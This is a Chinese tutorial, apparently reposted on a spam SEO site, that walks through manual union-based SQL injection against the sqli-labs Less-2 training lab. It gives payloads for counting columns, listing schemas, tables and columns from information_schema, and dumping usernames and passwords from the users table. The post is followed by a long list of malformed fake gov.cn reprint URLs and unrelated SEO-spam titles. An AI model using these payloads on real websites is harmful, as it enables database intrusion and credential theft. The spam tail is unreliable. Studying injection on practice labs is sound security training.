当前位置: 首页 > news >正文

荣胜网络 宁波网站建设网站制作公司官网

荣胜网络 宁波网站建设,网站制作公司官网,wordpress icp备案在哪个文件中,电影网站怎么做流量SQL注入的过程 手工注入过程 (1) 判断是否存在注入点; (2) 判断字段长度(字段数); (3) 判断字段回显位置; (4) 判断数据库信息; (5) 查找数据库名; (6) 查找数据库表; (7) 查找数据库表中所有字段以及字段值; (8) 猜解账号密码; (9) 登录管理员后台; 以sql-labs less-2举例 会…

 SQL注入的过程

手工注入过程

(1) 判断是否存在注入点;

(2) 判断字段长度(字段数);

(3) 判断字段回显位置;

(4) 判断数据库信息;

(5) 查找数据库名;

(6) 查找数据库表;

(7) 查找数据库表中所有字段以及字段值;

(8) 猜解账号密码;

(9) 登录管理员后台;


以sql-labs less-2举例

会有提示 请输入ID作为数值参数

Please input the ID as parameter with numeric value

id=1-12 都会返回值 也就是相当于该id列 共有12个值 1-12


(1) 判断是否存在注入点;

三步

?id=1'   报错数据库错误

?id=1 and 1=1 成功

?id=1 and 1=2 失败

通过这三点就可以看出 存在注入点并且注入点在url中 属于GET数字型注入点


(2) 判断字段长度(字段数);

使用order by排序进行判断

?id=1 and 1= 1 order by 1  对第一列排序 正常显示

?id=1 and 1= 1 order by 2  对第二列排序 正常显示

?id=1 and 1= 1 order by 3  对第三列排序 正常显示

?id=1 and 1= 1 order by 4  对第四列排序 错误显示:Unknown column '4' in 'order clause'

判断出 对前三列排序都是正常显示 对第四列排序显示错误:第四列未知 

使用 union 联合查询进行判断

?id=1 and 1= 1 union select 1                错误显示

?id=1 and 1= 1 union select 1,2             错误显示

?id=1 and 1= 1 union select 1,2,3          正常显示

?id=1 and 1= 1 union select 1,2,3,4       错误显示

判断出 联合查询为3列的时候能与原列数进行拼接 否则报错原因为:所使用的SELECT语句具有不同数量的列 

通过以上两种方法可以判断出 该表的字段数为3


(3) 判断字段回显位置;

目前知道有三个字段 但是只回显了两个字段的值 我们应该判断哪些字段是隐藏的 哪些字段是回显出来的

使用and否定前面的查询 使数据库执行union后的查询语句 

已知三个字段 给联合查询 三个常量值 1,2,3进行判断哪些字段显示出来了

?id=1 and 1= 2 union select 1,2,3 

回显的值为2和3,表示 能显示的位置为2号位和3号位也就是2字段和3字段,那么第1个字段就是隐藏位,从这个信息我们就可以的到下一步,如果我们设计payload的时候,我们希望把payload放到2号位和3号位的位置,只有这样我们才能够看到payload的返回结果(如果payload放到1号位 虽然也能执行 但是无法看到执行结果)


(4) 判断数据库信息;

获取服务器所有数据库

从目录数据库中进行查找 存放着MYSQL所有的数据库,表,列的名(上面提到过 这个目录数据库的数据库名 目录数据库的表名 目录数据库中表的列名都是固定的)(只演示获取数据库)

?id=1 and 1= 2 union select 1,2,schema_name from information_schema.schemata

schema_name

列有很多个值 但是3号位只能显示第一个值 只能显示第一个数据库的名

使用group_concat()函数聚合函数把当前列所有值连接成字符串 从而返回一个结果集 返回当前服务器存在的所有数据库

?id=1 and 1= 2 union select 1,2,group_concat(schema_name) from information_schema.schemata


5 获取当前网站的数据库

?id=1 and 1= 2 union select 1,2,database()

获取到网站数据库名security了 就开始获取security内的表了


(6) 查找数据库表;

?id=1 and 1= 2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"

到这我们认为users可能存放着敏感信息于是查询users表中字段名以及字段值


(7) 查找数据库表中所有字段以及字段值;

查询users字段名

?id=1 and 1= 2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"

查询每个字段的值

现在已经知道数据库为security表位users 就不需要目录数据库了

使用concat_ws()函数 将每个字段的值以逗号分开结合成字符串

如果不是用该函数3号位只能显示1个字段的一个值 使用后3号位能显示3个字段的3个值

使用limit逐行显示 不使用注释会报错 大概率是与服务器的固定部分语句冲突等原因

?id=1 and 1= 2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1 --

前7步已经得到想要的结果了账号密码了 (8) 猜解账号密码 略过  

当前靶场无登录界面 所以 (9) 登录管理员后台;略过

以上七步的所有结果后不确定是否正确

登录靶机的mysql中 查看security数据库users表中的内容进行验证 发现完全一致


文章转载自:
http://www.morning.bpmfz.cn.gov.cn.bpmfz.cn
http://www.morning.lcjw.cn.gov.cn.lcjw.cn
http://www.morning.yhwmg.cn.gov.cn.yhwmg.cn
http://www.morning.ktnmg.cn.gov.cn.ktnmg.cn
http://www.morning.gjwkl.cn.gov.cn.gjwkl.cn
http://www.morning.trfh.cn.gov.cn.trfh.cn
http://www.morning.gl-group.cn.gov.cn.gl-group.cn
http://www.morning.pdmml.cn.gov.cn.pdmml.cn
http://www.morning.rpth.cn.gov.cn.rpth.cn
http://www.morning.dbdmr.cn.gov.cn.dbdmr.cn
http://www.morning.nnwmd.cn.gov.cn.nnwmd.cn
http://www.morning.wyppp.cn.gov.cn.wyppp.cn
http://www.morning.zrfwz.cn.gov.cn.zrfwz.cn
http://www.morning.lbgsh.cn.gov.cn.lbgsh.cn
http://www.morning.xmjzn.cn.gov.cn.xmjzn.cn
http://www.morning.wjhqd.cn.gov.cn.wjhqd.cn
http://www.morning.wchsx.cn.gov.cn.wchsx.cn
http://www.morning.lkhfm.cn.gov.cn.lkhfm.cn
http://www.morning.qcrhb.cn.gov.cn.qcrhb.cn
http://www.morning.qxmnf.cn.gov.cn.qxmnf.cn
http://www.morning.wpmlp.cn.gov.cn.wpmlp.cn
http://www.morning.tbjtp.cn.gov.cn.tbjtp.cn
http://www.morning.jwefry.cn.gov.cn.jwefry.cn
http://www.morning.qmxsx.cn.gov.cn.qmxsx.cn
http://www.morning.bmfqg.cn.gov.cn.bmfqg.cn
http://www.morning.krdb.cn.gov.cn.krdb.cn
http://www.morning.hrnrx.cn.gov.cn.hrnrx.cn
http://www.morning.wnwjf.cn.gov.cn.wnwjf.cn
http://www.morning.lxfdh.cn.gov.cn.lxfdh.cn
http://www.morning.qsmdd.cn.gov.cn.qsmdd.cn
http://www.morning.rdxp.cn.gov.cn.rdxp.cn
http://www.morning.czwed.com.gov.cn.czwed.com
http://www.morning.bxqry.cn.gov.cn.bxqry.cn
http://www.morning.kpxky.cn.gov.cn.kpxky.cn
http://www.morning.wdxr.cn.gov.cn.wdxr.cn
http://www.morning.elsemon.com.gov.cn.elsemon.com
http://www.morning.jgykx.cn.gov.cn.jgykx.cn
http://www.morning.rlzxr.cn.gov.cn.rlzxr.cn
http://www.morning.thnpj.cn.gov.cn.thnpj.cn
http://www.morning.njstzsh.com.gov.cn.njstzsh.com
http://www.morning.nyqxy.cn.gov.cn.nyqxy.cn
http://www.morning.cwyfs.cn.gov.cn.cwyfs.cn
http://www.morning.qnjcx.cn.gov.cn.qnjcx.cn
http://www.morning.knmby.cn.gov.cn.knmby.cn
http://www.morning.dbrdg.cn.gov.cn.dbrdg.cn
http://www.morning.qnxtz.cn.gov.cn.qnxtz.cn
http://www.morning.lxkhx.cn.gov.cn.lxkhx.cn
http://www.morning.xhfky.cn.gov.cn.xhfky.cn
http://www.morning.c7495.cn.gov.cn.c7495.cn
http://www.morning.wrlff.cn.gov.cn.wrlff.cn
http://www.morning.ngznq.cn.gov.cn.ngznq.cn
http://www.morning.smrty.cn.gov.cn.smrty.cn
http://www.morning.knjj.cn.gov.cn.knjj.cn
http://www.morning.ltkzb.cn.gov.cn.ltkzb.cn
http://www.morning.nmhpq.cn.gov.cn.nmhpq.cn
http://www.morning.xkwrb.cn.gov.cn.xkwrb.cn
http://www.morning.tkzqw.cn.gov.cn.tkzqw.cn
http://www.morning.yqjjn.cn.gov.cn.yqjjn.cn
http://www.morning.tfpmf.cn.gov.cn.tfpmf.cn
http://www.morning.skqfx.cn.gov.cn.skqfx.cn
http://www.morning.gnkbf.cn.gov.cn.gnkbf.cn
http://www.morning.fqlxg.cn.gov.cn.fqlxg.cn
http://www.morning.bfhfb.cn.gov.cn.bfhfb.cn
http://www.morning.mkyny.cn.gov.cn.mkyny.cn
http://www.morning.ltspm.cn.gov.cn.ltspm.cn
http://www.morning.fdzzh.cn.gov.cn.fdzzh.cn
http://www.morning.tbnn.cn.gov.cn.tbnn.cn
http://www.morning.mlnbd.cn.gov.cn.mlnbd.cn
http://www.morning.dpsyr.cn.gov.cn.dpsyr.cn
http://www.morning.hqgxz.cn.gov.cn.hqgxz.cn
http://www.morning.qpsft.cn.gov.cn.qpsft.cn
http://www.morning.lkkgq.cn.gov.cn.lkkgq.cn
http://www.morning.dbnrl.cn.gov.cn.dbnrl.cn
http://www.morning.nxcgp.cn.gov.cn.nxcgp.cn
http://www.morning.mzcrs.cn.gov.cn.mzcrs.cn
http://www.morning.trzzm.cn.gov.cn.trzzm.cn
http://www.morning.cfnsn.cn.gov.cn.cfnsn.cn
http://www.morning.qwnqt.cn.gov.cn.qwnqt.cn
http://www.morning.kfyqd.cn.gov.cn.kfyqd.cn
http://www.morning.flfxb.cn.gov.cn.flfxb.cn
http://www.tj-hxxt.cn/news/116.html

相关文章:

  • 做公司网站的专业公司深圳地推的方法和技巧
  • wordpress academyseo博客网址
  • 动态网站如何维护软文营销的定义
  • 继电器做网站app拉新渠道商
  • 做发型的网站广告营销留电话网站
  • 做360手机网站优百度托管公司
  • 旅游网页效果图win7优化
  • 福田建网站公司平台推广费用一般是多少
  • 开发网站开奖类游戏需要什么技术东莞百度seo在哪里
  • 基于asp.net网站开发百度游戏官网
  • 网站的站内结构锚文本是如何做的全媒体运营师报名入口
  • 织梦网站建设培训班深圳推广公司有哪些
  • 电商网站 服务器游戏广告推广平台
  • 学校网站建设和维护情况惠州seo招聘
  • aso搜索排名优化南昌seo排名外包
  • 网站设计工资一般多少软文写作网站
  • 免费手机网站空间排名优化网站
  • 动漫设计学校哪里好长沙优化科技有限公司
  • 有没有个人做网站赚钱微信推广平台
  • 济宁做网站的公司网络seo优化公司
  • 网站推广需要几个人做中央网站seo
  • 深圳网站公司注册快速提升网站排名
  • 免费推广网站入口2020关键词优化上海
  • avada如何做中英文双语网站seo工程师是什么职业
  • 网站用哪些系统做的好处新手怎么入行sem
  • 购买游戏软件做网站网站备案
  • 做外单网站优化什么建立生育支持政策体系
  • 做公司网站要走哪些流程做百度推广的公司电话号码
  • 合肥做网站汇站网什么叫seo网络推广
  • 免费的网站在线客服软件什么是网站优化